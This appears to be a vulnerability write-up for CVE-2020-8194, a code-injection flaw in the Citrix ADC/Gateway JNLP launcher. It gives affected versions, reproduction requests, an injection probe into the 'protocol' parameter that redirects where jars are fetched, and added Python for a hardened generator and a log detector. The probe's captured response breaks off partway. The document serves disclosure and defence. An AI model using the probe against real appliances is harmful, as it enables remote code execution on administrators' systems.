4.87 KB / 2021-07-15 19:49:28
(CVE-2020-8194) Citrix unauthenticated access leading to arbitrary code execution
========================================================
    
1. Vulnerability summary
------------

Citrix ADC and Citrix (NetScaler) Gateway contain a reflected code injection vulnerability in the management interface. An unauthenticated remote attacker can use it to make the appliance generate a malicious file; if a victim on the management network opens that file, the attacker can execute arbitrary code in the context of that user. The file in question is the Java Web Start (JNLP) launcher for the Configuration Utility, which the appliance builds from URL parameters without validating or encoding them (see the reproduction below).
    
2. Affected versions
------------

Citrix ADC and Citrix Gateway: < 13.0-58.30

Citrix ADC and NetScaler Gateway: < 12.1-57.18

Citrix ADC and NetScaler Gateway: < 12.0-63.21

Citrix ADC and NetScaler Gateway: < 11.1-64.14

NetScaler ADC and NetScaler Gateway: < 10.5-70.18

Citrix SD-WAN WANOP: < 11.1.1a

Citrix SD-WAN WANOP: < 11.0.3d

Citrix SD-WAN WANOP: < 10.2.7

Citrix Gateway Plug-in for Linux: < 1.0.0.137
    
3. Reproduction
------------

> The Java Web Start file is generated from the following URL, which requires no authentication (the four query parameters are the values that end up reflected in the file):
    
        GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
        Host: www.0-sec.org
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Cookie: startupapp=st
        Upgrade-Insecure-Requests: 1
    
The appliance answers with a generated Java Web Start launcher (`Content-Type: application/x-java-jnlp-file`). When the victim's Java Web Start runs it, the launcher requests `<all-permissions/>`, fetches the listed jars relative to `codebase` and connects back to the appliance. The query values are copied in verbatim: `protocol=2` becomes the scheme of `codebase` and of the `-codebase` argument, `nsvpx=4` becomes the `-ns10` argument, and all four parameters reappear in `href`:
    
        HTTP/1.1 200 OK
        Date: Tue, 21 Jan 2020 20:32:44 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Cache-Control: max-age=10
        X-XSS-Protection: 1; mode=block
        Content-Length: 2320
        Connection: close
        Content-Type: application/x-java-jnlp-file
    
        <jnlp codebase="2://citrix.local" href="/menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4">
    
        <information>
        <title>GUI citrix.local</title>
        <vendor>Citrix Systems, Inc.</vendor>
        <homepage href="help/im/help.htm"/>
        <description>Configuration Utility - Web Start Client</description>
        <icon href="admin_ui/common/images/guiicon.gif"/>
        <shortcut online="true">
        <desktop/>
        </shortcut>
        </information>
    
        <security>
        <all-permissions/>
        </security>
    
        <resources>
        <j2se version="1.6+" initial-heap-size="256M" max-heap-size="256M" />
        <jar href="/admin_ui/php/application/views/applets/gui.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_images.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view1.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view2.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view3.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view4.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view5.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view6.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gui_view7.jar"/>
        <jar href="/admin_ui/php/application/views/applets/guicommon.jar"/>
        <jar href="/admin_ui/php/application/views/applets/ns.jar"/>
        <jar href="/admin_ui/php/application/views/applets/jnlp.jar"/>
        <jar href="/admin_ui/php/application/views/applets/sinetfactory.jar"/>
        <jar href="/admin_ui/php/application/views/applets/sslava.jar"/>
        <jar href="/admin_ui/php/application/views/applets/pixl.jar"/>
        <jar href="/admin_ui/php/application/views/applets/looks.jar"/>
        <jar href="/admin_ui/php/application/views/applets/l2fprod-common-tasks.jar"/>
        <jar href="/admin_ui/php/application/views/applets/commons-codec.jar"/>
        <jar href="/admin_ui/php/application/views/applets/java40.jar"/>
        <jar href="/admin_ui/php/application/views/applets/prefuse.jar"/>
        <jar href="/admin_ui/php/application/views/applets/gson.jar"/>
        </resources>
    
        <application-desc main-class="ns.im.Gui">
        <argument>-D</argument>
        <argument>0</argument>
        <argument>-WS</argument>
        <argument>0</argument>
        <argument>-codebase</argument>
        <argument>2://citrix.local</argument>
        <argument>-ns4</argument>
        <argument>1</argument>
        <argument>-ns10</argument><argument>4</argument></application-desc>
        </jnlp>
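The response above already shows the root cause: the query string is copied into the launcher with no encoding, and because relative `jar href` entries resolve against `codebase` while `<security>` asks for `<all-permissions/>`, whoever controls that attribute controls what the victim's Java Web Start downloads and runs. The following Python, added here as an example and not Citrix's code, models that interpolation next to a generator that validates and escapes; the hostname, the trimmed template, the `TOKEN` allowlist and the function names are assumptions, only the reflected attributes follow the captured response.

```python
"""Added example (not Citrix's code): models how /menu/guiw reflects its query
parameters into the JNLP captured above, next to a generator that validates
and escapes. HOST, the trimmed template, TOKEN and the function names are
assumptions; the reflected attributes follow the captured response."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

HOST = "citrix.local"                                      # assumed appliance name
JAR = "/admin_ui/php/application/views/applets/gui.jar"   # first jar in the captured list


def build_jnlp_vulnerable(params):
    """Interpolate the parameters the way the captured response does: no
    validation and no escaping, so a '"' inside `protocol` terminates the
    codebase attribute early. Like the real output, href keeps a raw '&'."""
    query = "&".join(f"{k}={v}" for k, v in params.items())
    codebase = f"{params['protocol']}://{HOST}"
    return (
        f'<jnlp codebase="{codebase}" href="/menu/guiw?{query}">\n'
        "<security><all-permissions/></security>\n"
        f'<resources><jar href="{JAR}"/></resources>\n'
        '<application-desc main-class="ns.im.Gui">'
        f"<argument>-codebase</argument><argument>{codebase}</argument>"
        f"<argument>-ns10</argument><argument>{params['nsvpx']}</argument>"
        "</application-desc>\n</jnlp>\n"
    )


# Hardened variant (my suggestion, not the vendor patch).
TOKEN = re.compile(r"^[A-Za-z0-9._-]{1,64}$")   # assumed allowlist for every parameter


def build_jnlp_fixed(params):
    """Reject anything outside a tight allowlist, then XML-escape every value
    anyway, so a future allowlist mistake still cannot break out of an
    attribute or an element."""
    for key, value in params.items():
        if not TOKEN.match(value):
            raise ValueError(f"parameter {key!r} rejected: {value!r}")
    query = "&".join(f"{k}={v}" for k, v in params.items())
    codebase = f"{params['protocol']}://{HOST}"
    return (
        f"<jnlp codebase={quoteattr(codebase)} href={quoteattr('/menu/guiw?' + query)}>\n"
        "<security><all-permissions/></security>\n"
        f"<resources><jar href={quoteattr(JAR)}/></resources>\n"
        '<application-desc main-class="ns.im.Gui">'
        f"<argument>-codebase</argument><argument>{escape(codebase)}</argument>"
        f"<argument>-ns10</argument><argument>{escape(params['nsvpx'])}</argument>"
        "</application-desc>\n</jnlp>\n"
    )


def effective_codebase(jnlp):
    """codebase as a lenient launcher reads it: the first quoted value after
    `codebase=` in the root element. Relative jar hrefs resolve against it."""
    m = re.search(r'<jnlp[^>]*?\bcodebase="([^"]*)"', jnlp)
    return m.group(1) if m else None


def strict_codebase(jnlp):
    """codebase as a strict XML parser sees it, or None when the document is
    not well-formed (the vulnerable output never is, because of the raw '&')."""
    try:
        return ET.fromstring(jnlp).get("codebase")
    except ET.ParseError:
        return None


if __name__ == "__main__":
    benign = {"nsbrand": "1", "protocol": "2", "id": "3", "nsvpx": "4"}
    evil = dict(benign, protocol='wiki.0-sec.org">')        # same break-out as the probe below
    print(effective_codebase(build_jnlp_vulnerable(benign)))  # 2://citrix.local
    print(effective_codebase(build_jnlp_vulnerable(evil)))    # wiki.0-sec.org
    try:
        build_jnlp_fixed(evil)
    except ValueError as err:
        print("fixed generator:", err)
    print(strict_codebase(build_jnlp_fixed(benign)))          # 2://citrix.local
```

The allowlist is the real fix; `quoteattr`/`escape` are defence in depth, and the two belong together because an allowlist alone tends to get widened later, while escaping alone still lets an attacker pick the scheme and host of `codebase`.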
    
As the response shows, the parameters are written into the launcher with no encoding at all. The next request puts `"` and `>` into `protocol` (the other parameters carry marker strings) to test whether we can break out of the attribute and inject our own content:
    
        GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo HTTP/1.1
        Host: www.0-sec.org
    
Response. The `"` closes the `codebase` attribute early, so the launcher now carries `codebase="wiki.0-sec.org"` and the remainder of the value, together with `href`, spills out unescaped as element content. That is what makes the reflection dangerous: `codebase` decides where the jars listed in the launcher are fetched from, and the launcher runs them with all permissions:
    
        HTTP/1.1 200 OK
        Date: Sun, 26 Jan 2020 12:52:01 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Cache-Control: max-age=10
        X-XSS-Protection: 1; mode=block
        Content-Length: 2398
        Connection: close
        Content-Type: application/x-java-jnlp-file
    
        <jnlp codebase="wiki.0-sec.org">://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo">
    
        <information>
        <title>GUI citrix.local</title>
        <vendor>Citrix Systems, Inc.</vendor>
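For defenders, the requests above are easy to recognise in the appliance's Apache access log: a GET to `/menu/guiw` whose parameters contain anything beyond the plain tokens the legitimate GUI sends. The Python below is an added example, not part of the original write-up or of any Citrix tooling; it runs that check over a few constructed log lines. The sample lines, the `ALLOWED` alphabet and the function names are assumptions. Apache writes a literal `"` in a request line as `\"`, so the raw form of the probe is included alongside the URL-encoded one.

```python
"""Added example (not from the write-up or Citrix): flags /menu/guiw requests
whose parameters carry JNLP break-out characters, run over constructed Apache
combined-log lines. Sample lines, ALLOWED and the function names are assumptions."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines, not real appliance logs. Line 1 carries the probe
# from the write-up URL-encoded; line 5 carries it raw, which Apache logs as \".
LOG_LINES = [
    '203.0.113.7 - - [26/Jan/2020:12:52:01 +0000] "GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org%22%3E&id=HENKC&nsvpx=phpinfo HTTP/1.1" 200 2398 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Jan/2020:20:32:44 +0000] "GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1" 200 2320 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [26/Jan/2020:12:53:10 +0000] "GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4%3Cevil%3E HTTP/1.1" 200 2401 "-" "curl/7.68.0"',
    '198.51.100.9 - - [26/Jan/2020:12:54:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 1234 "-" "curl/7.68.0"',
    r'198.51.100.9 - - [26/Jan/2020:12:55:31 +0000] "GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org\">&id=HENKC&nsvpx=phpinfo HTTP/1.1" 200 2398 "-" "curl/7.68.0"',
]

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ALLOWED = re.compile(r"^[A-Za-z0-9._-]*$")   # assumed: what the legitimate GUI ever sends
PARAMS = ("nsbrand", "protocol", "id", "nsvpx")


def inspect_line(line):
    """Return a finding for a /menu/guiw request with a parameter outside ALLOWED,
    otherwise None. Values are decoded a second time so %2522-style double
    encoding does not slip past the check."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != "/menu/guiw":
        return None
    query = parse_qs(url.query, keep_blank_values=True)
    bad = {}
    for name in PARAMS:
        for value in query.get(name, []):
            value = unquote(value)
            if not ALLOWED.match(value):
                bad[name] = value
    if not bad:
        return None
    return {"client": line.split(" ", 1)[0], "params": bad, "line": line}


def scan(lines):
    """All findings, in order of appearance."""
    return [f for f in map(inspect_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding["client"], finding["params"])
```

Because the vulnerable endpoint needs no authentication, a single hit from an unexpected source is already worth triaging; the real risk, however, is not the probe itself but a link to such a URL reaching an administrator, so the same check applied to web-proxy or mail-gateway logs is what catches the delivery.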
    
    